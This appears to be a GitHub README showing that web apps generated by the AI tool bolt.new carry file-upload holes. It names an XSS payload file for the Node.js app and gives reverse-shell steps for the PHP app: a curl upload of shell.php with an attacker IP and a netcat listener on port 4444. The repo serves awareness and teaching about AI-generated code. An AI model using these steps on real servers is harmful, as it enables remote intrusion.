XSS and Reverse Shell vulnerabilities in AI-generated webapps
Earlier this week I tested bolt.new, an AI tool for generating fullstack web apps in the browser.
It's fast, flashy… and dangerously naive when it comes to security.
This repo contains two projects I asked it to generate — both with serious vulnerabilities.
A Node.js + EJS file upload utility generated by Bolt.
Vulnerability: Allowed uploading .html files, served them directly — no sanitization.
🧪 Run the server:
cd node && npm install && npm run dev🧪 Payload: xss.html — upload this file
🔗 Visit /uploads/<filename> in your browser to trigger the script and verify that the JavaScript executes.
A PHP file upload handler that:
- Accepts all file types
- Uses original filenames
- Serves uploads from a public directory
🧪 Run the server:
cd php && php -S localhost:8080🧪 Payload: shell.php — insert your private IP or attacker IP and upload it curl -F 'file=@shell.php' http://localhost:8080/api/upload.php
💥 Visit /uploads/shell.php and ensure you have a listener running:
nc -lvnp 4444This repo is for educational and awareness purposes only. Please don’t deploy this as-is, and don’t use these techniques unethically.
AI tools can build working software in seconds — but they don’t think like attackers. You still need to review the code, validate inputs, and secure your apps.
Read the background and see the screenshots on my website or in the origina LinkedIn post
More blog content coming soon.